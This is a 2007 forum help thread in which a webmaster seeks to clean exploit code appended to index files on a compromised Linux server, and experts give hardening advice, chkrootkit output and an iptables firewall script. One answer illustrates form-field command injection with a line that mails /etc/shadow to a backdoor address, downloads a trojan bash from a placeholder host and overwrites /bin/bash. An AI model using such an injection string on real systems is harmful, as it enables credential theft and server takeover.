Solved

A program to fix Exploit infected index files

Posted on 2007-03-22
9
1,125 Views
Last Modified: 2011-10-03
Hi:

I have a Linux Server, running the last version of RedHat, with Apache, Sendmail, MailScanner and Spam Assassin, among others. I have now a big problem with a kinf of virus, and I need to solve this with a program. I will explain.

After past Dec 17th I realized that, in all this machine's Domains, all the files called "*index*", that is, that had the string "index" in its filename, being .htm, .thml, .php and even some image files like .gif, .jpg or .swf, presented, at the end of the file, some strange code that was identified by some antivirus client programs as Not-A-Virus.Exploit.HTML.Mht, and I was told it could be used by Hackers.

So, whenever someone accesses, from the browser, these index pages or images, the client antivirus says:

Threat detected. Virus Exploit Identified.

Well, I am quite concerned about this. I have fixed some of these index files by editing them manually. It is quite simple, because this strange code is put at the end of the file, even in the image files. But the problem is that there are hundreds and hundreds of them in my Server. So I need a program to run under each of the Domains, cleaning these files.

If you want to see one of these Domains, please access this: www.m2seguros.com.br and see what happens. Try to see the source code of this simple page and you will see the suspect code after the </HTML> Tag.

Please, help me with this. I looked for a ready-made software but I didn't find it. I guess it has to be specifically constructed. If one could construct one program in Perl or Bash, so that I can execute it under each Domain, from the command line, I would thank a lot.

Thanks in advance.

Mario./
0
Comment
Question by:multisites
  • 3
  • 3
9 Comments
 
LVL 18

Expert Comment

by:PowerIT
ID: 18778110
I'm not the scripting guy you are looking for.
But I'll tell you this: before starting to clean you'll have to lock down your servers. So patch them, set up access security correctly ...
Otherwise you will be infected again in no time.

J.
0
 
LVL 11

Expert Comment

by:kblack05
ID: 18837630
You should download, install and run chkrootkit from http://www.chkrootkit.org (slow to load site) and see if the box is compromised. Also, use 'lsof -i -P' to see what ports the box is listening on and post them back here please...
0
 

Author Comment

by:multisites
ID: 18837891
Hi, kblack05:

Here it is:

[root@srv1 mail]# lsof -i -P
COMMAND    PID     USER   FD   TYPE   DEVICE SIZE NODE NAME
named     1050    named   20u  IPv4 76679482       UDP localhost.localdomain:53
named     1050    named   21u  IPv4 76679483       TCP localhost.localdomain:53 (LISTEN)
named     1050    named   22u  IPv4 76679484       UDP srv1.multisitesdominios.com.br:53
named     1050    named   23u  IPv4 76679485       TCP srv1.multisitesdominios.com.br:53 (LISTEN)
named     1050    named   24u  IPv4 76679486       UDP *:59019
named     1050    named   25u  IPv4 76679487       TCP localhost.localdomain:953 (LISTEN)
httpd     1625   apache    3u  IPv4 74762902       TCP *:80 (LISTEN)
httpd     1625   apache    4u  IPv4 74762904       TCP *:443 (LISTEN)
snmpd     2101     root    8u  IPv4     2359       TCP *:199 (LISTEN)
snmpd     2101     root    9u  IPv4     2360       UDP *:161
mysqld    2196    mysql    3u  IPv4     2505       TCP *:3306 (LISTEN)
proftpd   2271   nobody    0u  IPv4 76026989       TCP *:21 (LISTEN)
sendmail  2704     root   10u  IPv4 76691149       TCP srv1.multisitesdominios.com.br:54982->200-207-11-50.speedyterra.com.br:25 (SYN_SENT)
httpd     4108   apache    3u  IPv4 74762902       TCP *:80 (LISTEN)
httpd     4108   apache    4u  IPv4 74762904       TCP *:443 (LISTEN)
httpd     7011   apache    3u  IPv4 74762902       TCP *:80 (LISTEN)
httpd     7011   apache    4u  IPv4 74762904       TCP *:443 (LISTEN)
httpd     7012   apache    3u  IPv4 74762902       TCP *:80 (LISTEN)
httpd     7012   apache    4u  IPv4 74762904       TCP *:443 (LISTEN)
httpd     7013   apache    3u  IPv4 74762902       TCP *:80 (LISTEN)
httpd     7013   apache    4u  IPv4 74762904       TCP *:443 (LISTEN)
httpd     7014   apache    3u  IPv4 74762902       TCP *:80 (LISTEN)
httpd     7014   apache    4u  IPv4 74762904       TCP *:443 (LISTEN)
sshd      7542     root    4u  IPv4 76293767       TCP srv1.multisitesdominios.com.br:22->c9532fe9.virtua.com.br:3240 (ESTABLISHED)
sshd      7544 multissh    4u  IPv4 76293767       TCP srv1.multisitesdominios.com.br:22->c9532fe9.virtua.com.br:3240 (ESTABLISHED)
sshd     12153     root    3u  IPv4  2405708       TCP *:22 (LISTEN)
httpd    13281   apache    3u  IPv4 74762902       TCP *:80 (LISTEN)
httpd    13281   apache    4u  IPv4 74762904       TCP *:443 (LISTEN)
httpd    18083   apache    3u  IPv4 74762902       TCP *:80 (LISTEN)
httpd    18083   apache    4u  IPv4 74762904       TCP *:443 (LISTEN)
httpd    18084   apache    3u  IPv4 74762902       TCP *:80 (LISTEN)
httpd    18084   apache    4u  IPv4 74762904       TCP *:443 (LISTEN)
httpd    18085   apache    3u  IPv4 74762902       TCP *:80 (LISTEN)
httpd    18085   apache    4u  IPv4 74762904       TCP *:443 (LISTEN)
spamd    19369     root    5u  IPv4 15471570       TCP localhost.localdomain:783 (LISTEN)
spamd    19369     root    6u  IPv4 15471578       UDP localhost.localdomain:56185->localhost.localdomain:53
httpd    19971     root    3u  IPv4 74762902       TCP *:80 (LISTEN)
httpd    19971     root    4u  IPv4 74762904       TCP *:443 (LISTEN)
httpd    20096   apache    3u  IPv4 74762902       TCP *:80 (LISTEN)
httpd    20096   apache    4u  IPv4 74762904       TCP *:443 (LISTEN)
httpd    20099   apache    3u  IPv4 74762902       TCP *:80 (LISTEN)
httpd    20099   apache    4u  IPv4 74762904       TCP *:443 (LISTEN)
clamd    23105   clamav    0u  IPv4 76453983       TCP localhost.localdomain:3310 (LISTEN)
sendmail 23133     root    4u  IPv4 76454020       TCP *:25 (LISTEN)
httpd    25190   apache    3u  IPv4 74762902       TCP *:80 (LISTEN)
httpd    25190   apache    4u  IPv4 74762904       TCP *:443 (LISTEN)
httpd    25194   apache    3u  IPv4 74762902       TCP *:80 (LISTEN)
httpd    25194   apache    4u  IPv4 74762904       TCP *:443 (LISTEN)
httpd    25195   apache    3u  IPv4 74762902       TCP *:80 (LISTEN)
httpd    25195   apache    4u  IPv4 74762904       TCP *:443 (LISTEN)
httpd    25198   apache    3u  IPv4 74762902       TCP *:80 (LISTEN)
httpd    25198   apache    4u  IPv4 74762904       TCP *:443 (LISTEN)
httpd    25794   apache    3u  IPv4 74762902       TCP *:80 (LISTEN)
httpd    25794   apache    4u  IPv4 74762904       TCP *:443 (LISTEN)
httpd    25795   apache    3u  IPv4 74762902       TCP *:80 (LISTEN)
httpd    25795   apache    4u  IPv4 74762904       TCP *:443 (LISTEN)
httpd    25795   apache  136u  IPv4 76691513       TCP srv1.multisitesdominios.com.br:80->200.222.35.126:59366 (FIN_WAIT1)
httpd    26584   apache    3u  IPv4 74762902       TCP *:80 (LISTEN)
httpd    26584   apache    4u  IPv4 74762904       TCP *:443 (LISTEN)
httpd    26585   apache    3u  IPv4 74762902       TCP *:80 (LISTEN)
httpd    26585   apache    4u  IPv4 74762904       TCP *:443 (LISTEN)
xinetd   30534     root    5u  IPv4 69311376       TCP *:110 (LISTEN)
spamd    30721     root    5u  IPv4 15471570       TCP localhost.localdomain:783 (LISTEN)
spamd    31728     root    5u  IPv4 15471570       TCP localhost.localdomain:783 (LISTEN)
0
Enabling OSINT in Activity Based Intelligence

Activity based intelligence (ABI) requires access to all available sources of data. Recorded Future allows analysts to observe structured data on the open, deep, and dark web.

 
LVL 11

Accepted Solution

by:
kblack05 earned 250 total points
ID: 18839021
Let me introduce you to your new bible: http://www.ecst.csuchico.edu/~dranch/LINUX/TrinityOS/cHTML/TrinityOS-c.html

Looks like your content is definately compromised! Run chkrootkit and see what it outputs. Be advised you may have a serious problem on your hands, a fresh install may be smart. Usually attacks like this come when someone has access to the box directly. Here is a list of the ways this is most commonly accomplished:

Man in the middle attack: Someone has been using telnet, or standard FTP to access the system (These daemons should not even be running, everyone should be using SSH, and SFTP over SSH to access the system)

Direct access. Someone has given out passwords or has emailed the passwords to the server around, and the passwords were captured along the mail circuit by redirection and filtering for lines like "assword" or "pword" and caught the emails. NEVER email passwords, I suggest getting a copy of "Password Safe" and learn how to use it. Another is "Stegano's Locknote". Then you send the passwords in an encrypted file with a password you give to the person over the phone, or personally. Make the password to the password enc file DIFFERENT from the passwords on the servers...

My recommendation to you is to try using chrootkit to see if you can find where the host is compromised. If you cannot find where it is broken, fix it, and firewall it, then you will likely need to format and re-install the box. :(

PHP or CGI Form Mailers. These are ALWAYS a bad idea. Any page content served from the Linux server should be rigorously validated for input. In other words, if there's a box the user can type into and hit "Submit" (POST to the server) then you need to be using that program to verify the input from the user does NOT contain any shell code or garbage. For example if you have a simple CGI textbox form to submit emails to a list, or something similar, if you aren't rigorously checking the input then I can simply do something like this

dummy@address.com ; mail backdoor@email.com << /etc/shadow ; mail backdoor@email.com << /etc/hosts ; wget http://zombiemasterhostaddress /bin/hacked_bash ; cp -rf ./hacked_bash /bin/bash

Or some similar method, and begin setting up a trojan attack on the server. With enough time and secrecy the box can be compromised, and daemons / content / port chains will be replaced. Chrootkit should help identify problems like these.

Also read up on input validation and cross site scripting attacks, for example http://securitytracker.com/alerts/2004/Apr/1009705.html (which is a good site resource)


Be advised that your server also has signatures turned on in Apache, which allows me to gather intelligence about what software your host is running, which allows me to further my attacks...

[root@schrute ~]# telnet srv1.multisitesdominios.com.br 80
Trying 200.157.211.200...
Connected to srv1.multisitesdominios.com.br (200.157.211.200).
Escape character is '^]'.
HEAD / HTTP/1.1

HTTP/1.1 400 Bad Request
Date: Mon, 02 Apr 2007 19:34:07 GMT
Server: Apache/2.0.51 (Fedora)
Connection: close
Content-Type: text/html; charset=iso-8859-1

Connection closed by foreign host.


Here is a basic IP Tables firewall. This is ALWAYS a good idea, even on hosts that access a NAT or other firewall, just so that you can specify in the settings which hosts can communicate with the mail or other services.

What I do is make a directory /etc/firewall, then copy this file in there as /etc/firewall/iptables.sh
(Credit to JLevie of EE for the original script, which I have heavily modified...)

NOTE * I have replaced all the IP Addressing CIDR notation (specified source address blocks) with 192.168.1. to keep my privacy. You'll need to set the ip address ranges for allowed hosts, or set them to 0/0 to allow ANY host to connect on that port.



#!/bin/sh
#
#
# service iptables save
#
# Set an absolute path to IPTABLES and define my IP.
# ('which iptables' to detect path to iptables.)

IPTABLES="/sbin/iptables"
IP1=192.168.1.128

#
# Clear out any existing firewall rules, and any chains that might have
# been created. Then set the default policies.
#

$IPTABLES -F
$IPTABLES -F INPUT
$IPTABLES -F OUTPUT
$IPTABLES -F FORWARD
$IPTABLES -F -t mangle
$IPTABLES -F -t nat
$IPTABLES -X
$IPTABLES -P INPUT DROP
$IPTABLES -P OUTPUT ACCEPT
$IPTABLES -P FORWARD ACCEPT

#
# Begin setting up the rulesets. First define some rule chains to handle
# exception conditions. These chains will receive packets that we aren't
# willing to pass. Limiters on logging are used so as to not to swamp the
# firewall in a DOS scenario.
#
# silent       - Just dop the packet
# tcpflags     - Log packets with bad flags, most likely an attack
# firewalled   - Log packets that that we refuse, possibly from an attack
#
$IPTABLES -N silent
$IPTABLES -A silent -j DROP

$IPTABLES -N tcpflags
$IPTABLES -A tcpflags -m limit --limit 15/minute -j LOG --log-prefix TCPflags:
$IPTABLES -A tcpflags -j DROP

$IPTABLES -N firewalled
$IPTABLES -A firewalled -m limit --limit 15/minute -j LOG --log-prefix Firewalled:
$IPTABLES -A firewalled -j DROP

#
# These are all TCP flag combinations that should never, ever, occur in the
# wild. All of these are illegal combinations that are used to attack a box
# in various ways.
#

$IPTABLES -A INPUT -p tcp --tcp-flags ALL FIN,URG,PSH -j tcpflags
$IPTABLES -A INPUT -p tcp --tcp-flags ALL ALL -j tcpflags
$IPTABLES -A INPUT -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -j tcpflags
$IPTABLES -A INPUT -p tcp --tcp-flags ALL NONE -j tcpflags
$IPTABLES -A INPUT -p tcp --tcp-flags SYN,RST SYN,RST -j tcpflags
$IPTABLES -A INPUT -p tcp --tcp-flags SYN,FIN SYN,FIN -j tcpflags

#
# Allow selected ICMP types and drop the rest.
#

$IPTABLES -A INPUT -p icmp --icmp-type 0 -j ACCEPT
$IPTABLES -A INPUT -p icmp --icmp-type 3 -j ACCEPT
$IPTABLES -A INPUT -p icmp --icmp-type 11 -j ACCEPT
$IPTABLES -A INPUT -p icmp --icmp-type 8 -m limit --limit 1/second -j ACCEPT
$IPTABLES -A INPUT -p icmp -j firewalled

#
# The loopback interface is inheritly trustworthy. Don't disable it or
# a number of things will break.
#

$IPTABLES -A INPUT -i lo -j ACCEPT
#
# Now allow Internet hosts access to those services we provide. Note that
# enabling inbound FTP 20 & 21 tcp will also require allowing ports
# 1024-65534/tcp. Which in itself is good enough reason not to allow FTP
# connections and to only allow ssh/scp/sftp.
#
# Allow ssh frpm anywhere to this server
#

$IPTABLES -A INPUT -p tcp -s 0/0 --dport 22 -j ACCEPT

#
# HTTP access from anywhere
#

$IPTABLES -A INPUT -p tcp -s 0/0 --dport 80 -j ACCEPT
$IPTABLES -A INPUT -p tcp -s 0/0 --dport 443 -j ACCEPT

#
# Database Access
#
#$IPTABLES -A INPUT -p tcp -s 0/0 --dport 3306 -j ACCEPT

# Postfix Access from Anywhere
$IPTABLES -A INPUT -p tcp -s 0/0 --dport 25 -j ACCEPT
$IPTABLES -A INPUT -p tcp -s 0/0 --dport 110 -j ACCEPT
#
# Samba
#

#$IPTABLES -A INPUT -p udp -m udp -s 192.168.1.0/24 --dport 137 -j ACCEPT
#$IPTABLES -A INPUT -p udp -m udp -s 192.168.1.0/24 --dport 138 -j ACCEPT
#$IPTABLES -A INPUT -p udp -m udp -s 192.168.1.0/24 --dport 137 -j ACCEPT
#$IPTABLES -A INPUT -p udp -m udp -s 192.168.1.0/24 --dport 138 -j ACCEPT
#$IPTABLES -A INPUT -p udp -m udp -s 192.168.1.0/24 --dport 137 -j ACCEPT
#$IPTABLES -A INPUT -p udp -m udp -s 192.168.1.0/24 --dport 138 -j ACCEPT

#$IPTABLES -A INPUT -m state --state NEW -m tcp -p tcp -s 192.168.1.0/24 --dport 139 -j ACCEPT
#$IPTABLES -A INPUT -m state --state NEW -m tcp -p tcp -s 192.168.1.0/24 --dport 445 -j ACCEPT
#$IPTABLES -A INPUT -m state --state NEW -m tcp -p tcp -s 192.168.1.0/24 --dport 139 -j ACCEPT
#$IPTABLES -A INPUT -m state --state NEW -m tcp -p tcp -s 192.168.1./24 --dport 445 -j ACCEPT
#$IPTABLES -A INPUT -m state --state NEW -m tcp -p tcp -s 192.168.1.0/24 --dport 139 -j ACCEPT
#$IPTABLES -A INPUT -m state --state NEW -m tcp -p tcp -s 192.168.1.0/24 --dport 445 -j ACCEPT


#
# DNS
#
#$IPTABLES -A INPUT -p tcp -s 0/0 --dport 53 -j ACCEPT
#$IPTABLES -A INPUT -p udp -s 0/0 --dport 53 -j ACCEPT

#$IPTABLES -A INPUT -p tcp -s 0/0 --dport 953 -j ACCEPT
#$IPTABLES -A INPUT -p udp -s 0/0 --dport 953 -j ACCEPT

#
# If there are trusted nodes you can allow then access to everything with
# something like:
#

$IPTABLES -A INPUT -s 192.168.1.0/24 -d $IP1 -j ACCEPT

# Let's drop the  spammers here:

iptables -t filter -A INPUT -i eth0 -p tcp -s 123.45.6.0/24 -j DROP

#
# Allow packets that are part of an established connection to pass
# through the firewall. This is required for normal Internet activity
# by inside clients.
#

$IPTABLES -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT

#
# Anything not already matched gets firewalled and logged.
#

$IPTABLES -A INPUT -j firewalled

0
 

Author Comment

by:multisites
ID: 18839926
Well, kblack05, I thank you a lot, although you have scared me! :-) I'm giving your report to the guy who takes care of my server. The best idea now would really to install a new operating system, a new Linux, but now, unfortunately, I don't have how to do this, because I can't have this server stopped a whole day, unless we did it in a weekend. I have to think about. By the way, I again thank you very much for your efforts to help me with all this info.
Mario./

0
 
LVL 11

Expert Comment

by:kblack05
ID: 18839969
Before getting too afraid, please download, install and run chrootkit.

I do this from the command line like so...
[root@core1 root]# wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz
--15:01:30--  ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz
           => `chkrootkit.tar.gz'
Resolving ftp.pangeia.com.br... 200.239.53.35
Connecting to ftp.pangeia.com.br[200.239.53.35]:21... connected.
Logging in as anonymous ... Logged in!
==> SYST ... done.    ==> PWD ... done.
==> TYPE I ... done.  ==> CWD /pub/seg/pac ... done.
==> PASV ... done.    ==> RETR chkrootkit.tar.gz ... done.
Length: 37,791 (unauthoritative)

100%[=================================================================================>] 37,791         7.34K/s    ETA 00:00

15:01:39 (7.05 KB/s) - `chkrootkit.tar.gz' saved [37,791]

[root@core1 root]# tar -zxvf chkrootkit.tar.gz
chkrootkit-0.47
chkrootkit-0.47/ACKNOWLEDGMENTS
chkrootkit-0.47/COPYRIGHT
chkrootkit-0.47/Makefile
chkrootkit-0.47/README
chkrootkit-0.47/README.chklastlog
chkrootkit-0.47/README.chkwtmp
chkrootkit-0.47/check_wtmpx.c
chkrootkit-0.47/chkdirs.c
chkrootkit-0.47/chklastlog.c
chkrootkit-0.47/chkproc.c
chkrootkit-0.47/chkrootkit
chkrootkit-0.47/chkrootkit.lsm
chkrootkit-0.47/chkutmp.c
chkrootkit-0.47/chkwtmp.c
chkrootkit-0.47/ifpromisc.c
chkrootkit-0.47/strings.c

[root@core1 root]# cd chkrootkit-0.47/

[root@core1 chkrootkit-0.47]# ls

ACKNOWLEDGMENTS  chkdirs.c     chkproc.c    chkrootkit.lsm  chkwtmp.c  ifpromisc.c  README             README.chkwtmp
check_wtmpx.c    chklastlog.c  chkrootkit*  chkutmp.c       COPYRIGHT  Makefile     README.chklastlog  strings.c

[root@core1 chkrootkit-0.47]# ./chkrootkit
ROOTDIR is `/'
Checking `amd'... not found
Checking `basename'... not infected
Checking `biff'... not found
Checking `chfn'... not infected
Checking `chsh'... not infected
Checking `cron'... not infected
Checking `crontab'... not infected
Checking `date'... not infected
Checking `du'... not infected
Checking `dirname'... not infected
Checking `echo'... not infected
Checking `egrep'... not infected
Checking `env'... not infected
Checking `find'... not infected
Checking `fingerd'... not found
Checking `gpm'... not found
Checking `grep'... not infected
Checking `hdparm'... not infected
Checking `su'... not infected
Checking `ifconfig'... not infected
Checking `inetd'... not tested
Checking `inetdconf'... not found
Checking `identd'... not found
Checking `init'... not infected
Checking `killall'... not infected
Checking `ldsopreload'... can't exec ./strings-static, not tested
Checking `login'... not infected
Checking `ls'... not infected
Checking `lsof'... not infected
Checking `mail'... not infected
Checking `mingetty'... not infected
Checking `netstat'... not infected
Checking `named'... not found
Checking `passwd'... not infected
Checking `pidof'... not infected
Checking `pop2'... not found
Checking `pop3'... not found
Checking `ps'... not infected
Checking `pstree'... not infected
Checking `rpcinfo'... not infected
Checking `rlogind'... not found
Checking `rshd'... not found
Checking `slogin'... not infected
Checking `sendmail'... not infected
Checking `sshd'... not infected
Checking `syslogd'... not infected
Checking `tar'... not infected
Checking `tcpd'... not infected
Checking `tcpdump'... not infected
Checking `top'... not infected
Checking `telnetd'... not found
Checking `timed'... not found
Checking `traceroute'... not infected
Checking `vdir'... not infected
Checking `w'... not infected
Checking `write'... not infected
Checking `aliens'... no suspect files
Searching for sniffer's logs, it may take a while... nothing found
Searching for HiDrootkit's default dir... nothing found
Searching for t0rn's default files and dirs... nothing found
Searching for t0rn's v8 defaults... nothing found
Searching for Lion Worm default files and dirs... nothing found
Searching for RSHA's default files and dir... nothing found
Searching for RH-Sharpe's default files... nothing found
Searching for Ambient's rootkit (ark) default files and dirs... nothing found
Searching for suspicious files and dirs, it may take a while...
/usr/lib/perl5/site_perl/5.8.5/i386-linux-thread-multi/auto/XBase/.packlist

Searching for LPD Worm files and dirs... nothing found
Searching for Ramen Worm files and dirs... nothing found
Searching for Maniac files and dirs... nothing found
Searching for RK17 files and dirs... nothing found
Searching for Ducoci rootkit... nothing found
Searching for Adore Worm... nothing found
Searching for ShitC Worm... nothing found
Searching for Omega Worm... nothing found
Searching for Sadmind/IIS Worm... nothing found
Searching for MonKit... nothing found
Searching for Showtee... nothing found
Searching for OpticKit... nothing found
Searching for T.R.K... nothing found
Searching for Mithra... nothing found
Searching for OBSD rk v1... nothing found
Searching for LOC rootkit... nothing found
Searching for Romanian rootkit... nothing found
Searching for HKRK rootkit... nothing found
Searching for Suckit rootkit... nothing found
Searching for Volc rootkit... nothing found
Searching for Gold2 rootkit... nothing found
Searching for TC2 Worm default files and dirs... nothing found
Searching for Anonoying rootkit default files and dirs... nothing found
Searching for ZK rootkit default files and dirs... nothing found
Searching for ShKit rootkit default files and dirs... nothing found
Searching for AjaKit rootkit default files and dirs... nothing found
Searching for zaRwT rootkit default files and dirs... nothing found
Searching for Madalin rootkit default files... nothing found
Searching for Fu rootkit default files... nothing found
Searching for ESRK rootkit default files... nothing found
Searching for rootedoor... nothing found
Searching for ENYELKM rootkit default files... nothing found
Searching for anomalies in shell history files... nothing found
Checking `asp'... not infected
Checking `bindshell'... not infected
Checking `lkm'... Checking `rexedcs'... not found
Checking `sniffer'... not tested: can't exec ./ifpromisc
Checking `w55808'... not infected
Checking `wted'... not tested: can't exec ./chkwtmp
Checking `scalper'... not infected
Checking `slapper'... not infected
Checking `z2'... not tested: can't exec ./chklastlog
Checking `chkutmp'... not tested: can't exec ./chkutmp
[root@core1 chkrootkit-0.47]#
0
 

Author Comment

by:multisites
ID: 18891901
Hi, kblack05:

Backing to the reported problem, as you may remember, this Server still runs an old Red Hat, for which there's no more update.

So, I have finally decided to install, probably in a couple of weeks, a new LINUX distribution on my Server, probably CENTOS, which I have in another Server.

But, until then, and even after having the new CENTOS running, I need to fix the tons of index files which were corrupted by the addition of that code I mentioned.

Please, could anyone help me with this? I looked for a ready-made software but I didn't find it. I found one, called Mass Text Replacer, from SyntaxRebels, but it works under Windows not under Linux. I guess one has to be specifically constructed. If someone could construct one program in Perl or Bash, so that I can execute it under each Domain, from the command line, I would thank a lot.

Mario./
0

Featured Post

Better Security Awareness With Threat Intelligence

See how one of the leading financial services organizations uses Recorded Future as part of a holistic threat intelligence program to promote security awareness and proactively and efficiently identify threats.

Join & Write a Comment

Suggested Solutions

Cybersecurity has become the buzzword of recent years and years to come. The inventions of cloud infrastructure and the Internet of Things has made us question our online safety. Let us explore how cloud- enabled cybersecurity can help us with our b…
Ransomware continues to be a growing problem for both personal and business users alike and Antivirus companies are still struggling to find a reliable way to protect you from this dangerous threat.
Get a first impression of how PRTG looks and learn how it works.   This video is a short introduction to PRTG, as an initial overview or as a quick start for new PRTG users.
Here's a very brief overview of the methods PRTG Network Monitor (https://www.paessler.com/prtg) offers for monitoring bandwidth, to help you decide which methods you´d like to investigate in more detail.  The methods are covered in more detail in o…

708 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

19 Experts available now in Live!

Get 1:1 Help Now